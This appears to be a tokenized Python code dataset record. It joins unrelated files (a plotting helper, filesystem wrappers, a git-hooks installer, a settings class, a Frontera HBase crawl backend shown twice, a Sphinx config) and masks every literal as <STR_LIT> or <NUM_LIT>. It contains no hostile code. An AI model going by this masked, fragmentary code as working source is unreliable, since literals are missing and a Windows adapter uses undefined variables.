, axis = None ) : <EOL> """<STR_LIT>""" <EOL> pr , q0 , q = var . test_whiteness ( h , repeats , True ) <EOL> if axis is None : <EOL> axis = current_axis ( ) <EOL> pdf , _ , _ = axis . hist ( q0 , <NUM_LIT:30> , normed = True , label = '<STR_LIT>' ) <EOL> axis . plot ( [ q , q ] , [ <NUM_LIT:0> , np . max ( pdf ) ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> axis . set_title ( '<STR_LIT>' % pr ) <EOL> axis . set_xlabel ( '<STR_LIT>' ) <EOL> axis . set_ylabel ( '<STR_LIT>' ) <EOL> axis . legend ( ) <EOL> return pr <EOL> def _plot_labels ( target , * labels ) : <EOL> for l in labels : <EOL> have_label = False <EOL> for child in target . get_children ( ) : <EOL> try : <EOL> if child . get_text ( ) == l [ '<STR_LIT:s>' ] and child . 
get_position ( ) == ( l [ '<STR_LIT:x>' ] , l [ '<STR_LIT:y>' ] ) : <EOL> have_label = True <EOL> break <EOL> except AttributeError : <EOL> pass <EOL> if not have_label : <EOL> target . text ( ** l ) </s>
<s> from bitfinex . client import Client , TradeClient </s>
<s> import glob <EOL> import os <EOL> class RealFilesystem ( object ) : <EOL> def create_directories ( self , path ) : <EOL> return os . makedirs ( path ) <EOL> def path_exists ( self , path ) : <EOL> return os . path . exists ( path ) <EOL> def is_directory ( self , path ) : <EOL> return os . path . isdir ( path ) <EOL> def is_file ( self , path ) : <EOL> return os . path . isfile ( path ) <EOL> def is_writable ( self , path ) : <EOL> return os . access ( path , os . W_OK ) <EOL> def _paths_in_directory ( self , directory , incl_subdirs = False ) : <EOL> assert self . is_directory ( directory ) <EOL> pattern = os . path . join ( directory , "<STR_LIT:*>" ) <EOL> result = glob . glob ( pattern ) <EOL> subdir_pattern = os . path . join ( directory , "<STR_LIT:*>" , "<STR_LIT:*>" ) <EOL> subdir_result = glob . glob ( subdir_pattern ) if incl_subdirs else [ ] <EOL> return result + subdir_result <EOL> def files_in_directory ( self , directory , include_subdirectories = False ) : <EOL> assert self . is_directory ( directory ) , "<STR_LIT>" <EOL> return filter ( <EOL> os . path . isfile , <EOL> self . _paths_in_directory ( directory , incl_subdirs = include_subdirectories ) , <EOL> ) <EOL> def subdirectories_of_directory ( self , directory , recursive = False ) : <EOL> assert self . is_directory ( directory ) , "<STR_LIT>" <EOL> return filter ( <EOL> os . path . isdir , <EOL> self . _paths_in_directory ( directory , incl_subdirs = recursive ) , <EOL> ) <EOL> class FakeFilesystem ( object ) : <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> self . fs = RealFilesystem ( ) <EOL> def adjusted_path ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if os . path . realpath ( path ) . startswith ( os . path . realpath ( self . root ) ) : <EOL> return path <EOL> to_components = lambda p : os . path . normpath ( p ) . split ( os . sep ) <EOL> root_components = to_components ( self . root ) <EOL> path_components = to_components ( path ) <EOL> if os . path . 
isabs ( path ) : <EOL> path_components . pop ( <NUM_LIT:0> ) <EOL> return os . sep . join ( root_components + path_components ) <EOL> def create_directories ( self , path ) : <EOL> return self . fs . create_directories ( self . adjusted_path ( path ) ) <EOL> def path_exists ( self , path ) : <EOL> return self . fs . path_exists ( self . adjusted_path ( path ) ) <EOL> def is_directory ( self , path ) : <EOL> return self . fs . is_directory ( self . adjusted_path ( path ) ) <EOL> def is_file ( self , path ) : <EOL> return self . fs . is_file ( self . adjusted_path ( path ) ) <EOL> def is_writable ( self , path ) : <EOL> return self . fs . is_writable ( self . adjusted_path ( path ) ) <EOL> def files_in_directory ( self , directory , include_subdirectories = False ) : <EOL> return self . fs . files_in_directory ( <EOL> self . adjusted_path ( directory ) , <EOL> include_subdirectories = include_subdirectories <EOL> ) <EOL> def subdirectories_of_directory ( self , directory , recursive = False ) : <EOL> return self . fs . files_in_directory ( <EOL> self . adjusted_path ( directory ) , <EOL> recursive = recursive <EOL> ) </s>
<s> import webbrowser <EOL> from ice . logs import logger <EOL> class LaunchSteamTask ( object ) : <EOL> def __call__ ( self , app_settings , users , dry_run ) : <EOL> webbrowser . open_new ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import glob <EOL> import os <EOL> import platform <EOL> import shutil <EOL> import subprocess <EOL> import sys <EOL> from subprocess import call <EOL> WINDOWS_VERSION_NEEDS_TESTING_ERROR_MESSAGE = """<STR_LIT>""" <EOL> GIT_HOOKS_ALREADY_EXIST_ERROR_MESSAGE = """<STR_LIT>""" <EOL> class WindowsSymlinkAdapter ( object ) : <EOL> def __init__ ( self ) : <EOL> print WINDOWS_VERSION_NEEDS_TESTING_ERROR_MESSAGE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import win32file <EOL> self . win32file = win32file <EOL> def exists_at_path ( self , path ) : <EOL> pass <EOL> def create ( self , name , target ) : <EOL> self . win32file . CreateSymbolicLink ( fileSrc , fileTarget , <NUM_LIT:1> ) <EOL> class UnixSymlinkAdapter ( object ) : <EOL> def exists_at_path ( self , path ) : <EOL> return os . path . islink ( path ) <EOL> def create ( self , name , target ) : <EOL> os . symlink ( target , name ) <EOL> def find_path_to_git_root ( ) : <EOL> return subprocess . check_output ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) . strip ( ) <EOL> def remove_preexisting_hooks_dir ( hooks_directory ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( hooks_directory ) : <EOL> return False <EOL> hooks = os . listdir ( hooks_directory ) <EOL> if len ( hooks ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> shutil . rmtree ( hooks_directory ) <EOL> return False <EOL> samples = glob . glob ( os . path . join ( hooks_directory , "<STR_LIT>" ) ) <EOL> if len ( hooks ) == len ( samples ) : <EOL> print "<STR_LIT>" <EOL> shutil . rmtree ( hooks_directory ) <EOL> return False <EOL> return True <EOL> def create_hooks_symlink ( adapter , target_hooks_path ) : <EOL> """<STR_LIT>""" <EOL> root_relative_path = find_path_to_git_root ( ) <EOL> target_hooks_path = os . path . abspath ( os . path . join ( root_relative_path , target_hooks_path ) ) <EOL> install_path = os . path . abspath ( os . path . join ( root_relative_path , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if adapter . 
exists_at_path ( install_path ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print "<STR_LIT>" % install_path <EOL> if remove_preexisting_hooks_dir ( install_path ) : <EOL> print GIT_HOOKS_ALREADY_EXIST_ERROR_MESSAGE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> adapter . create ( install_path , target_hooks_path ) <EOL> def main ( ) : <EOL> adapter = WindowsSymlinkAdapter ( ) if platform . system ( ) == '<STR_LIT>' else UnixSymlinkAdapter ( ) <EOL> create_hooks_symlink ( adapter , os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import hashlib <EOL> from pkgutil import get_data <EOL> from functools import wraps <EOL> import six <EOL> from yaml import load as load_yaml <EOL> from . utils import registry <EOL> @ registry <EOL> class Settings ( object ) : <EOL> """<STR_LIT>""" <EOL> _default = True <EOL> _yaml_data = None <EOL> def __init__ ( self , settings = None ) : <EOL> if settings : <EOL> self . _updateall ( settings . items ( ) ) <EOL> else : <EOL> self . _updateall ( self . _get_settings_from_yaml ( ) . items ( ) ) <EOL> @ classmethod <EOL> def get_key ( cls , settings = None ) : <EOL> if not settings : <EOL> return '<STR_LIT:default>' <EOL> keys = sorted ( [ '<STR_LIT>' % ( key , str ( settings [ key ] ) ) for key in settings ] ) <EOL> return hashlib . md5 ( '<STR_LIT>' . join ( keys ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) <EOL> @ classmethod <EOL> def _get_settings_from_yaml ( cls ) : <EOL> if not cls . _yaml_data : <EOL> data = get_data ( '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> cls . _yaml_data = load_yaml ( data ) . pop ( '<STR_LIT>' , { } ) <EOL> return cls . _yaml_data <EOL> def _updateall ( self , iterable ) : <EOL> for key , value in iterable : <EOL> setattr ( self , key , value ) <EOL> def replace ( self , ** kwds ) : <EOL> for x in six . iterkeys ( self . _get_settings_from_yaml ( ) ) : <EOL> kwds . setdefault ( x , getattr ( self , x ) ) <EOL> kwds [ '<STR_LIT>' ] = False <EOL> return self . __class__ ( settings = kwds ) <EOL> settings = Settings ( ) <EOL> def apply_settings ( f ) : <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , settings ) <EOL> if kwargs [ '<STR_LIT>' ] is None : <EOL> kwargs [ '<STR_LIT>' ] = settings <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , dict ) : <EOL> kwargs [ '<STR_LIT>' ] = settings . 
replace ( ** kwargs [ '<STR_LIT>' ] ) <EOL> if not isinstance ( kwargs [ '<STR_LIT>' ] , Settings ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> return f ( * args , ** kwargs ) <EOL> return wrapper </s>
<s> from struct import pack , unpack <EOL> from datetime import datetime <EOL> from calendar import timegm <EOL> from time import time <EOL> from binascii import hexlify , unhexlify <EOL> from zlib import crc32 <EOL> from io import BytesIO <EOL> from random import choice <EOL> from happybase import Connection <EOL> from frontera . utils . url import parse_domain_from_url_fast <EOL> from msgpack import Unpacker , Packer <EOL> from frontera import DistributedBackend <EOL> from frontera . core . components import Metadata , Queue , States <EOL> from frontera . core . models import Request <EOL> from distributed_frontera . worker . partitioner import Crc32NamePartitioner <EOL> from distributed_frontera . worker . utils import chunks <EOL> _pack_functions = { <EOL> '<STR_LIT:url>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:state>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:error>' : str , <EOL> '<STR_LIT>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:content>' : str <EOL> } <EOL> def unpack_score ( blob ) : <EOL> return unpack ( "<STR_LIT>" , blob ) [ <NUM_LIT:0> ] <EOL> def prepare_hbase_object ( obj = None , ** kwargs ) : <EOL> if not obj : <EOL> obj = dict ( ) <EOL> for k , v in kwargs . iteritems ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT:state>' ] : <EOL> cf = '<STR_LIT:s>' <EOL> elif k == '<STR_LIT:content>' : <EOL> cf = '<STR_LIT:c>' <EOL> else : <EOL> cf = '<STR_LIT:m>' <EOL> func = _pack_functions [ k ] <EOL> obj [ cf + '<STR_LIT::>' + k ] = func ( v ) <EOL> return obj <EOL> def utcnow_timestamp ( ) : <EOL> d = datetime . utcnow ( ) <EOL> return timegm ( d . timetuple ( ) ) <EOL> class HBaseQueue ( Queue ) : <EOL> GET_RETRIES = <NUM_LIT:3> <EOL> def __init__ ( self , connection , partitions , logger , table_name , drop = False ) : <EOL> self . 
connection = connection <EOL> self . partitions = [ i for i in range ( <NUM_LIT:0> , partitions ) ] <EOL> self . partitioner = Crc32NamePartitioner ( self . partitions ) <EOL> self . logger = logger <EOL> self . table_name = table_name <EOL> tables = set ( self . connection . tables ( ) ) <EOL> if drop and self . table_name in tables : <EOL> self . connection . delete_table ( self . table_name , disable = True ) <EOL> tables . remove ( self . table_name ) <EOL> if self . table_name not in tables : <EOL> self . connection . create_table ( self . table_name , { '<STR_LIT:f>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> pass <EOL> def schedule ( self , batch ) : <EOL> to_schedule = [ ] <EOL> for fprint , score , request , schedule in batch : <EOL> if schedule : <EOL> if '<STR_LIT>' not in request . meta : <EOL> _ , hostname , _ , _ , _ , _ = parse_domain_from_url_fast ( request . url ) <EOL> if not hostname : <EOL> self . logger . error ( "<STR_LIT>" % ( request . url , fprint ) ) <EOL> request . meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : hostname } <EOL> to_schedule . append ( ( score , fprint , request . meta [ '<STR_LIT>' ] , request . url ) ) <EOL> self . _schedule ( to_schedule ) <EOL> def _schedule ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> def get_crc32 ( name ) : <EOL> return crc32 ( name ) if type ( name ) is str else crc32 ( name . 
encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def get_interval ( score , resolution ) : <EOL> if score < <NUM_LIT:0.0> or score > <NUM_LIT:1.0> : <EOL> raise OverflowError <EOL> i = int ( score / resolution ) <EOL> if i % <NUM_LIT:10> == <NUM_LIT:0> and i > <NUM_LIT:0> : <EOL> i = i - <NUM_LIT:1> <EOL> return ( i * resolution , ( i + <NUM_LIT:1> ) * resolution ) <EOL> timestamp = int ( time ( ) * <NUM_LIT> ) <EOL> data = dict ( ) <EOL> for score , fingerprint , domain , url in batch : <EOL> if type ( domain ) == dict : <EOL> partition_id = self . partitioner . partition ( domain [ '<STR_LIT:name>' ] , self . partitions ) <EOL> host_crc32 = get_crc32 ( domain [ '<STR_LIT:name>' ] ) <EOL> elif type ( domain ) == int : <EOL> partition_id = self . partitioner . partition_by_hash ( domain , self . partitions ) <EOL> host_crc32 = domain <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> item = ( unhexlify ( fingerprint ) , host_crc32 , url , score ) <EOL> score = <NUM_LIT:1> - score <EOL> rk = "<STR_LIT>" % ( partition_id , "<STR_LIT>" % get_interval ( score , <NUM_LIT> ) , timestamp ) <EOL> data . setdefault ( rk , [ ] ) . append ( ( score , item ) ) <EOL> table = self . connection . table ( self . table_name ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk , tuples in data . iteritems ( ) : <EOL> obj = dict ( ) <EOL> for score , item in tuples : <EOL> column = '<STR_LIT>' % get_interval ( score , <NUM_LIT> ) <EOL> obj . setdefault ( column , [ ] ) . append ( item ) <EOL> final = dict ( ) <EOL> packer = Packer ( ) <EOL> for column , items in obj . iteritems ( ) : <EOL> stream = BytesIO ( ) <EOL> for item in items : <EOL> stream . write ( packer . pack ( item ) ) <EOL> final [ column ] = stream . getvalue ( ) <EOL> b . put ( rk , final ) <EOL> def get_next_requests ( self , max_n_requests , partition_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> min_requests = kwargs . pop ( '<STR_LIT>' ) <EOL> min_hosts = kwargs . 
pop ( '<STR_LIT>' ) <EOL> max_requests_per_host = kwargs . pop ( '<STR_LIT>' ) <EOL> assert ( max_n_requests > min_requests ) <EOL> table = self . connection . table ( self . table_name ) <EOL> meta_map = { } <EOL> queue = { } <EOL> limit = min_requests <EOL> tries = <NUM_LIT:0> <EOL> count = <NUM_LIT:0> <EOL> while tries < self . GET_RETRIES : <EOL> tries += <NUM_LIT:1> <EOL> limit *= <NUM_LIT> if tries > <NUM_LIT:1> else <NUM_LIT:1.0> <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , limit , count , len ( queue . keys ( ) ) ) ) <EOL> meta_map . clear ( ) <EOL> queue . clear ( ) <EOL> count = <NUM_LIT:0> <EOL> for rk , data in table . scan ( row_prefix = '<STR_LIT>' % partition_id , limit = int ( limit ) , batch_size = <NUM_LIT> ) : <EOL> for cq , buf in data . iteritems ( ) : <EOL> stream = BytesIO ( buf ) <EOL> unpacker = Unpacker ( stream ) <EOL> for item in unpacker : <EOL> fingerprint , host_crc32 , url , score = item <EOL> if host_crc32 not in queue : <EOL> queue [ host_crc32 ] = [ ] <EOL> if max_requests_per_host is not None and len ( queue [ host_crc32 ] ) > max_requests_per_host : <EOL> continue <EOL> queue [ host_crc32 ] . append ( fingerprint ) <EOL> count += <NUM_LIT:1> <EOL> if fingerprint not in meta_map : <EOL> meta_map [ fingerprint ] = [ ] <EOL> meta_map [ fingerprint ] . append ( ( rk , item ) ) <EOL> if count > max_n_requests : <EOL> break <EOL> if min_hosts is not None and len ( queue . keys ( ) ) < min_hosts : <EOL> continue <EOL> if count < min_requests : <EOL> continue <EOL> break <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , len ( queue . keys ( ) ) , count ) ) <EOL> fprint_map = { } <EOL> for fprint , meta_list in meta_map . iteritems ( ) : <EOL> for rk , _ in meta_list : <EOL> fprint_map . setdefault ( rk , [ ] ) . append ( fprint ) <EOL> results = [ ] <EOL> trash_can = set ( ) <EOL> for _ , fprints in queue . iteritems ( ) : <EOL> for fprint in fprints : <EOL> for rk , _ in meta_map [ fprint ] : <EOL> trash_can . 
add ( rk ) <EOL> for rk_fprint in fprint_map [ rk ] : <EOL> _ , item = meta_map [ rk_fprint ] [ <NUM_LIT:0> ] <EOL> _ , _ , url , score = item <EOL> results . append ( Request ( url , meta = { <EOL> '<STR_LIT>' : hexlify ( rk_fprint ) , <EOL> '<STR_LIT>' : score , <EOL> } ) ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk in trash_can : <EOL> b . delete ( rk ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( trash_can ) ) ) <EOL> return results <EOL> def count ( self ) : <EOL> return NotImplementedError <EOL> class HBaseState ( States ) : <EOL> def __init__ ( self , connection , table_name , logger , cache_size_limit ) : <EOL> self . connection = connection <EOL> self . _table_name = table_name <EOL> self . logger = logger <EOL> self . _state_cache = { } <EOL> self . _cache_size_limit = cache_size_limit <EOL> def update_cache ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def put ( obj ) : <EOL> if obj . meta [ '<STR_LIT:state>' ] is not None : <EOL> self . _state_cache [ obj . meta [ '<STR_LIT>' ] ] = obj . meta [ '<STR_LIT:state>' ] <EOL> map ( put , objs ) <EOL> def set_states ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def get ( obj ) : <EOL> fprint = obj . meta [ '<STR_LIT>' ] <EOL> obj . meta [ '<STR_LIT:state>' ] = self . _state_cache [ fprint ] if fprint in self . _state_cache else None <EOL> map ( get , objs ) <EOL> def flush ( self , force_clear ) : <EOL> if len ( self . _state_cache ) > self . _cache_size_limit : <EOL> force_clear = True <EOL> table = self . connection . table ( self . _table_name ) <EOL> for chunk in chunks ( self . _state_cache . items ( ) , <NUM_LIT> ) : <EOL> with table . batch ( transaction = True ) as b : <EOL> for fprint , state in chunk : <EOL> hb_obj = prepare_hbase_object ( state = state ) <EOL> b . put ( unhexlify ( fprint ) , hb_obj ) <EOL> if force_clear : <EOL> self . logger . 
debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . _state_cache . clear ( ) <EOL> def fetch ( self , fingerprints ) : <EOL> to_fetch = [ f for f in fingerprints if f not in self . _state_cache ] <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( to_fetch ) , len ( fingerprints ) ) ) <EOL> for chunk in chunks ( to_fetch , <NUM_LIT> ) : <EOL> keys = [ unhexlify ( fprint ) for fprint in chunk ] <EOL> table = self . connection . table ( self . _table_name ) <EOL> records = table . rows ( keys , columns = [ '<STR_LIT>' ] ) <EOL> for key , cells in records : <EOL> if '<STR_LIT>' in cells : <EOL> state = unpack ( '<STR_LIT>' , cells [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . _state_cache [ hexlify ( key ) ] = state <EOL> class HBaseMetadata ( Metadata ) : <EOL> def __init__ ( self , connection , table_name , drop_all_tables , use_snappy , batch_size , store_content ) : <EOL> self . _table_name = table_name <EOL> tables = set ( connection . tables ( ) ) <EOL> if drop_all_tables and self . _table_name in tables : <EOL> connection . delete_table ( self . _table_name , disable = True ) <EOL> tables . remove ( self . _table_name ) <EOL> if self . _table_name not in tables : <EOL> schema = { '<STR_LIT:m>' : { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT:s>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True , } , <EOL> '<STR_LIT:c>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> if use_snappy : <EOL> schema [ '<STR_LIT:m>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> schema [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> connection . create_table ( self . _table_name , schema ) <EOL> table = connection . table ( self . _table_name ) <EOL> self . batch = table . batch ( batch_size = batch_size ) <EOL> self . 
store_content = store_content <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> self . batch . send ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> for seed in seeds : <EOL> obj = prepare_hbase_object ( url = seed . url , <EOL> depth = <NUM_LIT:0> , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = seed . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( seed . meta [ '<STR_LIT>' ] ) , obj ) <EOL> def page_crawled ( self , response , links ) : <EOL> obj = prepare_hbase_object ( status_code = response . status_code , content = response . body ) if self . store_content else prepare_hbase_object ( status_code = response . status_code ) <EOL> links_dict = dict ( ) <EOL> for link in links : <EOL> links_dict [ unhexlify ( link . meta [ '<STR_LIT>' ] ) ] = ( link , link . url , link . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( response . meta [ '<STR_LIT>' ] ) , obj ) <EOL> for link_fingerprint , ( link , link_url , link_domain ) in links_dict . iteritems ( ) : <EOL> obj = prepare_hbase_object ( url = link_url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = link_domain [ '<STR_LIT>' ] ) <EOL> self . batch . put ( link_fingerprint , obj ) <EOL> def request_error ( self , request , error ) : <EOL> obj = prepare_hbase_object ( url = request . url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> error = error , <EOL> domain_fingerprint = request . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> rk = unhexlify ( request . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( rk , obj ) <EOL> def update_score ( self , batch ) : <EOL> if not isinstance ( batch , dict ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for fprint , ( score , url , schedule ) in batch . iteritems ( ) : <EOL> obj = prepare_hbase_object ( score = score ) <EOL> rk = unhexlify ( fprint ) <EOL> self . batch . 
put ( rk , obj ) <EOL> class HBaseBackend ( DistributedBackend ) : <EOL> component_name = '<STR_LIT>' <EOL> def __init__ ( self , manager ) : <EOL> self . manager = manager <EOL> self . logger = manager . logger . backend <EOL> settings = manager . settings <EOL> port = settings . get ( '<STR_LIT>' ) <EOL> hosts = settings . get ( '<STR_LIT>' ) <EOL> namespace = settings . get ( '<STR_LIT>' ) <EOL> self . queue_partitions = settings . get ( '<STR_LIT>' ) <EOL> host = choice ( hosts ) if type ( hosts ) in [ list , tuple ] else hosts <EOL> kwargs = { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : int ( port ) , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : '<STR_LIT::>' <EOL> } <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . connection = Connection ( ** kwargs ) <EOL> self . _metadata = None <EOL> self . _queue = None <EOL> self . _states = None <EOL> @ classmethod <EOL> def strategy_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> o . _states = HBaseState ( o . connection , settings . get ( '<STR_LIT>' ) , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ classmethod <EOL> def db_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> drop_all_tables = settings . get ( '<STR_LIT>' ) <EOL> o . _queue = HBaseQueue ( o . connection , o . queue_partitions , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) , drop = drop_all_tables ) <EOL> o . _metadata = HBaseMetadata ( o . connection , settings . get ( '<STR_LIT>' ) , drop_all_tables , <EOL> settings . get ( '<STR_LIT>' ) , settings . get ( '<STR_LIT>' ) , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ property <EOL> def metadata ( self ) : <EOL> return self . _metadata <EOL> @ property <EOL> def queue ( self ) : <EOL> return self . 
_queue <EOL> @ property <EOL> def states ( self ) : <EOL> return self . _states <EOL> def frontier_start ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_start ( ) <EOL> def frontier_stop ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_stop ( ) <EOL> self . connection . close ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> self . metadata . add_seeds ( seeds ) <EOL> def page_crawled ( self , response , links ) : <EOL> self . metadata . page_crawled ( response , links ) <EOL> def request_error ( self , page , error ) : <EOL> self . metadata . request_error ( page , error ) <EOL> def finished ( self ) : <EOL> raise NotImplementedError <EOL> def get_next_requests ( self , max_next_requests , ** kwargs ) : <EOL> next_pages = [ ] <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> partitions = set ( kwargs . pop ( '<STR_LIT>' , [ ] ) ) <EOL> for partition_id in range ( <NUM_LIT:0> , self . queue_partitions ) : <EOL> if partition_id not in partitions : <EOL> continue <EOL> results = self . queue . get_next_requests ( max_next_requests , partition_id , min_requests = <NUM_LIT:64> , <EOL> min_hosts = <NUM_LIT> , max_requests_per_host = <NUM_LIT> ) <EOL> next_pages . extend ( results ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( results ) , partition_id ) ) <EOL> return next_pages </s>
<s> import sys <EOL> from os import path <EOL> dir = path . dirname ( __file__ ) <EOL> sys . path . extend ( [ path . join ( dir , "<STR_LIT>" ) , path . join ( dir , "<STR_LIT>" ) ] ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if on_rtd : <EOL> html_theme = '<STR_LIT:default>' <EOL> else : <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> autoclass_content = '<STR_LIT>' </s>
<s> from struct import pack , unpack <EOL> from datetime import datetime <EOL> from calendar import timegm <EOL> from time import time <EOL> from binascii import hexlify , unhexlify <EOL> from zlib import crc32 <EOL> from io import BytesIO <EOL> from random import choice <EOL> from happybase import Connection <EOL> from frontera . utils . url import parse_domain_from_url_fast <EOL> from msgpack import Unpacker , Packer <EOL> from frontera import DistributedBackend <EOL> from frontera . core . components import Metadata , Queue , States <EOL> from frontera . core . models import Request <EOL> from frontera . contrib . backends . partitioners import Crc32NamePartitioner <EOL> from frontera . utils . misc import chunks <EOL> _pack_functions = { <EOL> '<STR_LIT:url>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:state>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:error>' : str , <EOL> '<STR_LIT>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:content>' : str <EOL> } <EOL> def unpack_score ( blob ) : <EOL> return unpack ( "<STR_LIT>" , blob ) [ <NUM_LIT:0> ] <EOL> def prepare_hbase_object ( obj = None , ** kwargs ) : <EOL> if not obj : <EOL> obj = dict ( ) <EOL> for k , v in kwargs . iteritems ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT:state>' ] : <EOL> cf = '<STR_LIT:s>' <EOL> elif k == '<STR_LIT:content>' : <EOL> cf = '<STR_LIT:c>' <EOL> else : <EOL> cf = '<STR_LIT:m>' <EOL> func = _pack_functions [ k ] <EOL> obj 